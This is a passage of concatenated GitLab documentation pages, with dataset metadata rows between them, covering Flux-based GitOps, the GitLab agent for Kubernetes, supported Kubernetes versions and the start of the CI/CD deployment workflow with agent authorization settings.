{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/346567) from GitLab Premium to GitLab Free in 15.3. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346585) to make the `id` attribute optional in GitLab 15.7. - Specifying a branch, tag, or commit reference to fetch the Kubernetes manifest files [introduced](https://gitlab.com/groups/gitlab-org/-/epics/4516) in GitLab 15.7. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/395364) in GitLab 16.1 to prioritize Flux for GitOps. {{< /history >}} GitLab integrates [Flux](https://fluxcd.io/flux/) for GitOps. To get started with Flux, see the [Flux for GitOps tutorial](getting_started.md). With GitOps, you can manage containerized clusters and applications from a Git repository that: - Is the single source of truth of your system. - Is the single place where you operate your system. By combining GitLab, Kubernetes, and GitOps, you can have: - GitLab as the GitOps operator. - Kubernetes as the automation and convergence system. - GitLab CI/CD for Continuous Integration. - The agent for Continuous Deployment and cluster observability. - Built-in automatic drift remediation. - Resource management with [server-side applies](https://kubernetes.io/docs/reference/using-api/server-side-apply/) for transparent multi-actor field management. ## Deployment sequence This diagram shows the repositories and main actors in a GitOps deployment: ```mermaid %%{init: { "fontFamily": "GitLab Sans" }}%% sequenceDiagram accTitle: Deployment sequence accDescr: Shows the repositories and main actors in a GitOps deployment. participant D as Developer participant A as Application code repository participant M as Deployment repository participant R as OCI registry participant C as Agent configuration repository participant K as GitLab agent participant F as Flux loop Regularly K-->>C: Grab the configuration end D->>+A: Pushing code changes A->>M: Updating manifest M->>R: Build an OCI artifact M->>K: Notify K->>F: Notify and watch sync R-->>F: Pulling and applying changes K->>M: Notify after sync ``` You should use both Flux and `agentk` for GitOps deployments. Flux keeps the cluster state synchronized with the source, while `agentk` simplifies the Flux setup, provides cluster-to-GitLab access management, and visualizes the cluster state in the GitLab UI. ### OCI for source control You should use OCI images as a source controller for Flux, instead of a Git repository. The [GitLab container registry](../../packages/container_registry/_index.md) supports OCI images. | OCI registry | Git repository | | --- | --- | | Designed to serve container images at scale. | Designed to version and store source code. | | Immutable, supports security scans. | Mutable. | | The default Git branch can store cluster state without triggering a sync. | The default Git branch triggers a sync when used to store cluster state. | ## Repository structure To simplify configuration, use one delivery repository per team. You can package the delivery repository into multiple OCI images per application. For additional repository structure recommendations, see the [Flux documentation](https://fluxcd.io/flux/guides/repository-structure/). ## Immediate Git repository reconciliation {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/392852) in GitLab 16.1 with a [flag](../../../administration/feature_flags/_index.md) named `notify_kas_on_git_push`. Disabled by default. - [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/126527) in GitLab 16.2. - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/410429) in GitLab 16.3. {{< /history >}} Usually, the Flux source controller reconciles Git repositories at configured intervals. This can cause delays between a `git push` and the reconciliation of the cluster state, and results in unnecessary pulls from GitLab. The agent for Kubernetes automatically detects Flux `GitRepository` objects that reference GitLab projects in the instance the agent is connected to, and configures a [`Receiver`](https://fluxcd.io/flux/components/notification/receivers/) for the instance. When the agent for Kubernetes detects a `git push` to a repository it has access to, the `Receiver` is triggered and Flux reconciles the cluster with any changes to the repository. To use immediate Git repository reconciliation, you must have a Kubernetes cluster that runs: - The agent for Kubernetes. - Flux `source-controller` and `notification-controller`. Immediate Git repository reconciliation can reduce the time between a push and reconciliation, but it doesn't guarantee that every `git push` event is received. You should still set [`GitRepository.spec.interval`](https://fluxcd.io/flux/components/source/gitrepositories/#interval) to an acceptable duration. {{< alert type="note" >}} The agent only has access to the agent configuration project and all public projects. The agent is not able to immediately reconcile any private projects, except the agent configuration project. Allowing the agent to access private projects is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393). {{< /alert >}} ### Custom webhook endpoints When the agent for Kubernetes calls the `Receiver` webhook, the agent defaults to `http://webhook-receiver.flux-system.svc.cluster.local`, which is also the default URL set by a Flux bootstrap installation. To configure a custom endpoint, set `flux.webhook_receiver_url` to a URL that the agent can resolve. For example: ```yaml flux: webhook_receiver_url: http://webhook-receiver.another-flux-namespace.svc.cluster.local ``` There is special handing for [service proxy URLs](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster-services/) configured in this format: `/api/v1/namespaces/[^/]+/services/[^/]+/proxy`. For example: ```yaml flux: webhook_receiver_url: /api/v1/namespaces/flux-system/services/http:webhook-receiver:80/proxy ``` In these cases, the agent for Kubernetes uses the available Kubernetes configuration and context to connect to the API endpoint. You can use this if you run an agent outside a cluster and you haven't [configured an `Ingress`](https://fluxcd.io/flux/guides/webhook-receivers/#expose-the-webhook-receiver) for the Flux notification controller. {{< alert type="warning" >}} You should configure only trusted service proxy URLs. When you provide a service proxy URL, the agent for Kubernetes sends typical Kubernetes API requests which include the credentials necessary to authenticate with the API service. {{< /alert >}} ## Token management To use certain Flux features, you might need multiple access tokens. Additionally, you can use multiple token types to achieve the same result. This section provides guidelines for the tokens you might need, and provides token type recommendations where possible. ### GitLab access by Flux To access the GitLab the container registry or Git repositories, Flux can use: - A project or group deploy token. - A project or group deploy key. - A project or group access token. - A personal access token. The token does not need write access. You should use project deploy tokens if `http` access is possible. If you require `git+ssh` access, you should use deploy keys. To compare deploy keys and deploy tokens, see [Deploy keys](../../project/deploy_keys/_index.md). Support for automating deploy token creation, rotation, and reporting is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393). ### Flux to GitLab notification If you configure Flux to synchronize from a Git source, [Flux can register an external job status](https://fluxcd.io/flux/components/notification/providers/#git-commit-status-updates) in GitLab pipelines. To get external job statuses from Flux, you can use: - A project or group deploy token. - A project or group access token. - A personal access token. The token requires `api` scope. To minimize the attack surface of a leaked token, you should use a project access token. Integrating Flux into GitLab pipelines as a job is proposed in [issue 405007](https://gitlab.com/gitlab-org/gitlab/-/issues/405007). ## Related topics - [GitOps working examples for training and demos](https://gitlab.com/groups/guided-explorations/gl-k8s-agent/gitops/-/wikis/home) - [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (Uses AWS EKS, but you can use for other Kubernetes clusters) - Managing Kubernetes secrets in a GitOps workflow - [with SOPS built-in to Flux](https://fluxcd.io/flux/guides/mozilla-sops/) - [with Sealed Secrets](https://fluxcd.io/flux/guides/sealed-secrets/)
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using GitOps with a Kubernetes cluster breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Moved](https://gitlab.com/gitlab-org/gitlab/-/issues/346567) from GitLab Premium to GitLab Free in 15.3. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346585) to make the `id` attribute optional in GitLab 15.7. - Specifying a branch, tag, or commit reference to fetch the Kubernetes manifest files [introduced](https://gitlab.com/groups/gitlab-org/-/epics/4516) in GitLab 15.7. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/395364) in GitLab 16.1 to prioritize Flux for GitOps. {{< /history >}} GitLab integrates [Flux](https://fluxcd.io/flux/) for GitOps. To get started with Flux, see the [Flux for GitOps tutorial](getting_started.md). With GitOps, you can manage containerized clusters and applications from a Git repository that: - Is the single source of truth of your system. - Is the single place where you operate your system. By combining GitLab, Kubernetes, and GitOps, you can have: - GitLab as the GitOps operator. - Kubernetes as the automation and convergence system. - GitLab CI/CD for Continuous Integration. - The agent for Continuous Deployment and cluster observability. - Built-in automatic drift remediation. - Resource management with [server-side applies](https://kubernetes.io/docs/reference/using-api/server-side-apply/) for transparent multi-actor field management. ## Deployment sequence This diagram shows the repositories and main actors in a GitOps deployment: ```mermaid %%{init: { "fontFamily": "GitLab Sans" }}%% sequenceDiagram accTitle: Deployment sequence accDescr: Shows the repositories and main actors in a GitOps deployment. participant D as Developer participant A as Application code repository participant M as Deployment repository participant R as OCI registry participant C as Agent configuration repository participant K as GitLab agent participant F as Flux loop Regularly K-->>C: Grab the configuration end D->>+A: Pushing code changes A->>M: Updating manifest M->>R: Build an OCI artifact M->>K: Notify K->>F: Notify and watch sync R-->>F: Pulling and applying changes K->>M: Notify after sync ``` You should use both Flux and `agentk` for GitOps deployments. Flux keeps the cluster state synchronized with the source, while `agentk` simplifies the Flux setup, provides cluster-to-GitLab access management, and visualizes the cluster state in the GitLab UI. ### OCI for source control You should use OCI images as a source controller for Flux, instead of a Git repository. The [GitLab container registry](../../packages/container_registry/_index.md) supports OCI images. | OCI registry | Git repository | | --- | --- | | Designed to serve container images at scale. | Designed to version and store source code. | | Immutable, supports security scans. | Mutable. | | The default Git branch can store cluster state without triggering a sync. | The default Git branch triggers a sync when used to store cluster state. | ## Repository structure To simplify configuration, use one delivery repository per team. You can package the delivery repository into multiple OCI images per application. For additional repository structure recommendations, see the [Flux documentation](https://fluxcd.io/flux/guides/repository-structure/). ## Immediate Git repository reconciliation {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/392852) in GitLab 16.1 with a [flag](../../../administration/feature_flags/_index.md) named `notify_kas_on_git_push`. Disabled by default. - [Enabled on GitLab.com and GitLab Self-Managed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/126527) in GitLab 16.2. - [Feature flag removed](https://gitlab.com/gitlab-org/gitlab/-/issues/410429) in GitLab 16.3. {{< /history >}} Usually, the Flux source controller reconciles Git repositories at configured intervals. This can cause delays between a `git push` and the reconciliation of the cluster state, and results in unnecessary pulls from GitLab. The agent for Kubernetes automatically detects Flux `GitRepository` objects that reference GitLab projects in the instance the agent is connected to, and configures a [`Receiver`](https://fluxcd.io/flux/components/notification/receivers/) for the instance. When the agent for Kubernetes detects a `git push` to a repository it has access to, the `Receiver` is triggered and Flux reconciles the cluster with any changes to the repository. To use immediate Git repository reconciliation, you must have a Kubernetes cluster that runs: - The agent for Kubernetes. - Flux `source-controller` and `notification-controller`. Immediate Git repository reconciliation can reduce the time between a push and reconciliation, but it doesn't guarantee that every `git push` event is received. You should still set [`GitRepository.spec.interval`](https://fluxcd.io/flux/components/source/gitrepositories/#interval) to an acceptable duration. {{< alert type="note" >}} The agent only has access to the agent configuration project and all public projects. The agent is not able to immediately reconcile any private projects, except the agent configuration project. Allowing the agent to access private projects is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393). {{< /alert >}} ### Custom webhook endpoints When the agent for Kubernetes calls the `Receiver` webhook, the agent defaults to `http://webhook-receiver.flux-system.svc.cluster.local`, which is also the default URL set by a Flux bootstrap installation. To configure a custom endpoint, set `flux.webhook_receiver_url` to a URL that the agent can resolve. For example: ```yaml flux: webhook_receiver_url: http://webhook-receiver.another-flux-namespace.svc.cluster.local ``` There is special handing for [service proxy URLs](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster-services/) configured in this format: `/api/v1/namespaces/[^/]+/services/[^/]+/proxy`. For example: ```yaml flux: webhook_receiver_url: /api/v1/namespaces/flux-system/services/http:webhook-receiver:80/proxy ``` In these cases, the agent for Kubernetes uses the available Kubernetes configuration and context to connect to the API endpoint. You can use this if you run an agent outside a cluster and you haven't [configured an `Ingress`](https://fluxcd.io/flux/guides/webhook-receivers/#expose-the-webhook-receiver) for the Flux notification controller. {{< alert type="warning" >}} You should configure only trusted service proxy URLs. When you provide a service proxy URL, the agent for Kubernetes sends typical Kubernetes API requests which include the credentials necessary to authenticate with the API service. {{< /alert >}} ## Token management To use certain Flux features, you might need multiple access tokens. Additionally, you can use multiple token types to achieve the same result. This section provides guidelines for the tokens you might need, and provides token type recommendations where possible. ### GitLab access by Flux To access the GitLab the container registry or Git repositories, Flux can use: - A project or group deploy token. - A project or group deploy key. - A project or group access token. - A personal access token. The token does not need write access. You should use project deploy tokens if `http` access is possible. If you require `git+ssh` access, you should use deploy keys. To compare deploy keys and deploy tokens, see [Deploy keys](../../project/deploy_keys/_index.md). Support for automating deploy token creation, rotation, and reporting is proposed in [issue 389393](https://gitlab.com/gitlab-org/gitlab/-/issues/389393). ### Flux to GitLab notification If you configure Flux to synchronize from a Git source, [Flux can register an external job status](https://fluxcd.io/flux/components/notification/providers/#git-commit-status-updates) in GitLab pipelines. To get external job statuses from Flux, you can use: - A project or group deploy token. - A project or group access token. - A personal access token. The token requires `api` scope. To minimize the attack surface of a leaked token, you should use a project access token. Integrating Flux into GitLab pipelines as a job is proposed in [issue 405007](https://gitlab.com/gitlab-org/gitlab/-/issues/405007). ## Related topics - [GitOps working examples for training and demos](https://gitlab.com/groups/guided-explorations/gl-k8s-agent/gitops/-/wikis/home) - [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (Uses AWS EKS, but you can use for other Kubernetes clusters) - Managing Kubernetes secrets in a GitOps workflow - [with SOPS built-in to Flux](https://fluxcd.io/flux/guides/mozilla-sops/) - [with Sealed Secrets](https://fluxcd.io/flux/guides/sealed-secrets/)
https://docs.gitlab.com/user/clusters/agent
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/_index.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Connecting a Kubernetes cluster with GitLab
Kubernetes integration, GitOps, CI/CD, agent deployment, and cluster management.
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Flux [recommended](https://gitlab.com/gitlab-org/gitlab/-/issues/357947#note_1253489000) as GitOps solution in GitLab 15.10. {{< /history >}} You can connect your Kubernetes cluster with GitLab to deploy, manage, and monitor your cloud-native solutions. To connect a Kubernetes cluster to GitLab, you must first [install an agent in your cluster](install/_index.md). The agent runs in the cluster, and you can use it to: - Communicate with a cluster, which is behind a firewall or NAT. - Access API endpoints in a cluster in real time. - Push information about events happening in the cluster. - Enable a cache of Kubernetes objects, which are kept up-to-date with very low latency. For more details about the agent's purpose and architecture, see the [architecture documentation](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/architecture.md). You must deploy a separate agent to every cluster you want to connect to GitLab. The agent was designed with strong multi-tenancy support. To simplify maintenance and operations you should run only one agent per cluster. An agent is always registered in a GitLab project. After an agent is registered and installed, the agent connection to the cluster can be shared with other projects, groups, and users. This approach means you can manage and configure your agent instances from GitLab itself, and you can scale a single installation to multiple tenants. ## Receptive agents {{< details >}} - Tier: Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/12180) in GitLab 17.4. {{< /history >}} Receptive agents allow GitLab to integrate with Kubernetes clusters that cannot establish a network connection to the GitLab instance, but can be connected to by GitLab. For example, this can occur when: 1. GitLab runs in a private network or behind a firewall, and is only accessible only through VPN. 1. The Kubernetes cluster is hosted by a cloud provider, but is exposed to the internet or is reachable from the private network. When this feature is enabled, GitLab connects to the agent with the provided URL. You can use agents and receptive agents simultaneously. ## Supported Kubernetes versions for GitLab features GitLab supports the following Kubernetes versions. If you want to run GitLab in a Kubernetes cluster, you might need a different version of Kubernetes: - For the [Helm Chart](https://docs.gitlab.com/charts/installation/cloud/). - For [GitLab Operator](https://docs.gitlab.com/operator/installation.html). You can upgrade your Kubernetes version to a supported version at any time: - 1.33 (support ends when GitLab version 19.2 is released or when 1.36 becomes supported) - 1.32 (support ends when GitLab version 18.10 is released or when 1.35 becomes supported) - 1.31 (support ends when GitLab version 18.7 is released or when 1.34 becomes supported) GitLab aims to support a new minor Kubernetes version three months after its initial release. GitLab supports at least three production-ready Kubernetes minor versions at any given time. When a new version of Kubernetes is released, we will: - Update this page with the results of our early smoke tests within approximately four weeks. - If we expect a delay in releasing new version support, we will update this page with the expected GitLab support version within approximately eight weeks. When installing the agent, use a Helm version compatible with your Kubernetes version. Other versions of Helm might not work. For a list of compatible versions, see the [Helm version support policy](https://helm.sh/docs/topics/version_skew/). Support for deprecated APIs can be removed from the GitLab codebase when we drop support for the Kubernetes version that only supports the deprecated API. Some GitLab features might work on versions not listed here. [This epic](https://gitlab.com/groups/gitlab-org/-/epics/4827) tracks support for Kubernetes versions. ## Kubernetes deployment workflows You can choose from two primary workflows. The GitOps workflow is recommended. ### GitOps workflow GitLab recommends using [Flux for GitOps](gitops.md). To get started, see [Tutorial: Set up Flux for GitOps](getting_started.md). ### GitLab CI/CD workflow In a [**CI/CD** workflow](ci_cd_workflow.md), you configure GitLab CI/CD to use the Kubernetes API to query and update your cluster. This workflow is considered **push-based**, because GitLab pushes requests from GitLab CI/CD to your cluster. Use this workflow: - When you have pipeline-driven processes. - When you need to migrate to the agent, but the GitOps workflow doesn't support your use case. This workflow has a weaker security model. You should not use a CI/CD workflow for production deployments. ## Agent connection technical details The agent opens a bidirectional channel to KAS for communication. This channel is used for all communication between the agent and KAS: - Each agent can maintain up to 500 logical gRPC streams, including active and idle streams. - The number of TCP connections used by the gRPC streams is determined by gRPC itself. - Each connection has a maximum lifetime of two hours, with a one-hour grace period. - A proxy in front of KAS might influence the maximum lifetime of connections. On GitLab.com, this is [two hours](https://gitlab.com/gitlab-cookbooks/gitlab-haproxy/-/blob/68df3484087f0af368d074215e17056d8ab69f1c/attributes/default.rb#L217). The grace period is 50% of the maximum lifetime. For detailed information about channel routing, see [Routing KAS requests in the agent](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kas_request_routing.md). ## Kubernetes integration glossary This glossary provides definitions for terms related to the GitLab Kubernetes integration. | Term | Definition | Scope | | --- | --- | --- | | GitLab agent for Kubernetes | The overall offering, including related features and the underlying components `agentk` and `kas`. | GitLab, Kubernetes, Flux | | `agentk` | The cluster-side component that maintains a secure connection to GitLab for Kubernetes management and deployment automation. | GitLab | | GitLab agent server for Kubernetes (`kas`) | The GitLab-side component of GitLab that handles operations and logic for the Kubernetes agent integration. Manages the connection and communication between GitLab and Kubernetes clusters. | GitLab | | Pull-based deployment | A deployment method where Flux checks for changes in a Git repository and automatically applies these changes to the cluster. | GitLab, Kubernetes | | Push-based deployment | A deployment method where updates are sent from GitLab CI/CD pipelines to the Kubernetes cluster. | GitLab | | Flux | An open-source GitOps tool that integrates with the agent for pull-based deployments. | GitOps, Kubernetes | | GitOps | A set of practices that involve using Git for version control and collaboration in the management and automation of cloud and Kubernetes resources. | DevOps, Kubernetes | | Kubernetes namespace | A logical partition in a Kubernetes cluster that divides cluster resources between multiple users or environments. | Kubernetes | ## Related topics - [GitOps workflow](gitops.md) - [GitOps examples and learning materials](gitops.md#related-topics) - [GitLab CI/CD workflow](ci_cd_workflow.md) - [Install the agent](install/_index.md) - [Work with the agent](work_with_agent.md) - [Migrate to the agent for Kubernetes from the legacy certificate-based integration](../../infrastructure/clusters/migrate_to_gitlab_agent.md) - [Troubleshooting](troubleshooting.md) - [Guided explorations for a production ready GitOps setup](https://gitlab.com/groups/guided-explorations/gl-k8s-agent/gitops/-/wikis/home#gitlab-agent-for-kubernetes-gitops-working-examples) - [CI/CD for Kubernetes examples and learning materials](ci_cd_workflow.md#related-topics) - [Contribute to the agent's development](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/tree/master/doc)
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Connecting a Kubernetes cluster with GitLab description: Kubernetes integration, GitOps, CI/CD, agent deployment, and cluster management. breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Flux [recommended](https://gitlab.com/gitlab-org/gitlab/-/issues/357947#note_1253489000) as GitOps solution in GitLab 15.10. {{< /history >}} You can connect your Kubernetes cluster with GitLab to deploy, manage, and monitor your cloud-native solutions. To connect a Kubernetes cluster to GitLab, you must first [install an agent in your cluster](install/_index.md). The agent runs in the cluster, and you can use it to: - Communicate with a cluster, which is behind a firewall or NAT. - Access API endpoints in a cluster in real time. - Push information about events happening in the cluster. - Enable a cache of Kubernetes objects, which are kept up-to-date with very low latency. For more details about the agent's purpose and architecture, see the [architecture documentation](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/architecture.md). You must deploy a separate agent to every cluster you want to connect to GitLab. The agent was designed with strong multi-tenancy support. To simplify maintenance and operations you should run only one agent per cluster. An agent is always registered in a GitLab project. After an agent is registered and installed, the agent connection to the cluster can be shared with other projects, groups, and users. This approach means you can manage and configure your agent instances from GitLab itself, and you can scale a single installation to multiple tenants. ## Receptive agents {{< details >}} - Tier: Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/12180) in GitLab 17.4. {{< /history >}} Receptive agents allow GitLab to integrate with Kubernetes clusters that cannot establish a network connection to the GitLab instance, but can be connected to by GitLab. For example, this can occur when: 1. GitLab runs in a private network or behind a firewall, and is only accessible only through VPN. 1. The Kubernetes cluster is hosted by a cloud provider, but is exposed to the internet or is reachable from the private network. When this feature is enabled, GitLab connects to the agent with the provided URL. You can use agents and receptive agents simultaneously. ## Supported Kubernetes versions for GitLab features GitLab supports the following Kubernetes versions. If you want to run GitLab in a Kubernetes cluster, you might need a different version of Kubernetes: - For the [Helm Chart](https://docs.gitlab.com/charts/installation/cloud/). - For [GitLab Operator](https://docs.gitlab.com/operator/installation.html). You can upgrade your Kubernetes version to a supported version at any time: - 1.33 (support ends when GitLab version 19.2 is released or when 1.36 becomes supported) - 1.32 (support ends when GitLab version 18.10 is released or when 1.35 becomes supported) - 1.31 (support ends when GitLab version 18.7 is released or when 1.34 becomes supported) GitLab aims to support a new minor Kubernetes version three months after its initial release. GitLab supports at least three production-ready Kubernetes minor versions at any given time. When a new version of Kubernetes is released, we will: - Update this page with the results of our early smoke tests within approximately four weeks. - If we expect a delay in releasing new version support, we will update this page with the expected GitLab support version within approximately eight weeks. When installing the agent, use a Helm version compatible with your Kubernetes version. Other versions of Helm might not work. For a list of compatible versions, see the [Helm version support policy](https://helm.sh/docs/topics/version_skew/). Support for deprecated APIs can be removed from the GitLab codebase when we drop support for the Kubernetes version that only supports the deprecated API. Some GitLab features might work on versions not listed here. [This epic](https://gitlab.com/groups/gitlab-org/-/epics/4827) tracks support for Kubernetes versions. ## Kubernetes deployment workflows You can choose from two primary workflows. The GitOps workflow is recommended. ### GitOps workflow GitLab recommends using [Flux for GitOps](gitops.md). To get started, see [Tutorial: Set up Flux for GitOps](getting_started.md). ### GitLab CI/CD workflow In a [**CI/CD** workflow](ci_cd_workflow.md), you configure GitLab CI/CD to use the Kubernetes API to query and update your cluster. This workflow is considered **push-based**, because GitLab pushes requests from GitLab CI/CD to your cluster. Use this workflow: - When you have pipeline-driven processes. - When you need to migrate to the agent, but the GitOps workflow doesn't support your use case. This workflow has a weaker security model. You should not use a CI/CD workflow for production deployments. ## Agent connection technical details The agent opens a bidirectional channel to KAS for communication. This channel is used for all communication between the agent and KAS: - Each agent can maintain up to 500 logical gRPC streams, including active and idle streams. - The number of TCP connections used by the gRPC streams is determined by gRPC itself. - Each connection has a maximum lifetime of two hours, with a one-hour grace period. - A proxy in front of KAS might influence the maximum lifetime of connections. On GitLab.com, this is [two hours](https://gitlab.com/gitlab-cookbooks/gitlab-haproxy/-/blob/68df3484087f0af368d074215e17056d8ab69f1c/attributes/default.rb#L217). The grace period is 50% of the maximum lifetime. For detailed information about channel routing, see [Routing KAS requests in the agent](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kas_request_routing.md). ## Kubernetes integration glossary This glossary provides definitions for terms related to the GitLab Kubernetes integration. | Term | Definition | Scope | | --- | --- | --- | | GitLab agent for Kubernetes | The overall offering, including related features and the underlying components `agentk` and `kas`. | GitLab, Kubernetes, Flux | | `agentk` | The cluster-side component that maintains a secure connection to GitLab for Kubernetes management and deployment automation. | GitLab | | GitLab agent server for Kubernetes (`kas`) | The GitLab-side component of GitLab that handles operations and logic for the Kubernetes agent integration. Manages the connection and communication between GitLab and Kubernetes clusters. | GitLab | | Pull-based deployment | A deployment method where Flux checks for changes in a Git repository and automatically applies these changes to the cluster. | GitLab, Kubernetes | | Push-based deployment | A deployment method where updates are sent from GitLab CI/CD pipelines to the Kubernetes cluster. | GitLab | | Flux | An open-source GitOps tool that integrates with the agent for pull-based deployments. | GitOps, Kubernetes | | GitOps | A set of practices that involve using Git for version control and collaboration in the management and automation of cloud and Kubernetes resources. | DevOps, Kubernetes | | Kubernetes namespace | A logical partition in a Kubernetes cluster that divides cluster resources between multiple users or environments. | Kubernetes | ## Related topics - [GitOps workflow](gitops.md) - [GitOps examples and learning materials](gitops.md#related-topics) - [GitLab CI/CD workflow](ci_cd_workflow.md) - [Install the agent](install/_index.md) - [Work with the agent](work_with_agent.md) - [Migrate to the agent for Kubernetes from the legacy certificate-based integration](../../infrastructure/clusters/migrate_to_gitlab_agent.md) - [Troubleshooting](troubleshooting.md) - [Guided explorations for a production ready GitOps setup](https://gitlab.com/groups/guided-explorations/gl-k8s-agent/gitops/-/wikis/home#gitlab-agent-for-kubernetes-gitops-working-examples) - [CI/CD for Kubernetes examples and learning materials](ci_cd_workflow.md#related-topics) - [Contribute to the agent's development](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/tree/master/doc)
https://docs.gitlab.com/user/clusters/ci_cd_workflow
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/ci_cd_workflow.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
ci_cd_workflow.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Using GitLab CI/CD with a Kubernetes cluster
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Agent connection sharing limit [changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/149844) from 100 to 500 in GitLab 17.0. {{< /history >}} You can use GitLab CI/CD to safely connect, deploy, and update your Kubernetes clusters. To do so, [install an agent in your cluster](install/_index.md). When done, you have a Kubernetes context and can run Kubernetes API commands in your GitLab CI/CD pipeline. To ensure access to your cluster is safe: - Each agent has a separate context (`kubecontext`). - Only the project where the agent is configured, and any additional projects you authorize, can access the agent in your cluster. To use GitLab CI/CD to interact with your cluster, runners must be registered with GitLab. However, these runners do not have to be in the cluster where the agent is. Prerequisites: - Make sure [GitLab CI/CD is enabled](../../../ci/pipelines/settings.md#disable-gitlab-cicd-pipelines). ## Use GitLab CI/CD with your cluster To update a Kubernetes cluster with GitLab CI/CD: 1. Ensure you have a working Kubernetes cluster and the manifests are in a GitLab project. 1. In the same GitLab project, [register and install the GitLab agent for Kubernetes](install/_index.md). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. If you have multiple GitLab projects that contain Kubernetes manifests: 1. [Install the GitLab agent for Kubernetes](install/_index.md) in its own project, or in one of the GitLab projects where you keep Kubernetes manifests. 1. [Authorize agent access](#authorize-agent-access) in your GitLab projects. 1. Optional. For added security, [use impersonation](#restrict-project-and-group-access-by-using-impersonation). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. ## Authorize agent access If you have multiple projects with Kubernetes manifests, you must authorize these projects to access the agent. You can authorize agent access for individual projects, groups, or subgroups so all projects have access. For added security, you can also [use impersonation](#restrict-project-and-group-access-by-using-impersonation). Authorization configuration can take one or two minutes to propagate. ### Authorize your projects to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/356831) to allow authorizing projects in a user namespace in GitLab 15.7. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize the GitLab project where you keep Kubernetes manifests to access the agent: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `projects` attribute. 1. For the `id`, add the path to the project. ```yaml ci_access: projects: - id: path/to/project ``` - Authorized projects must have the same top-level group or user namespace as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. - You can install additional agents into the same cluster to accommodate additional hierarchies. - You can authorize up to 500 projects. After making these changes: - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize projects in your groups to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize all of the GitLab projects in a group or subgroup to access the agent: 1. On the left sidebar, select **Search or go 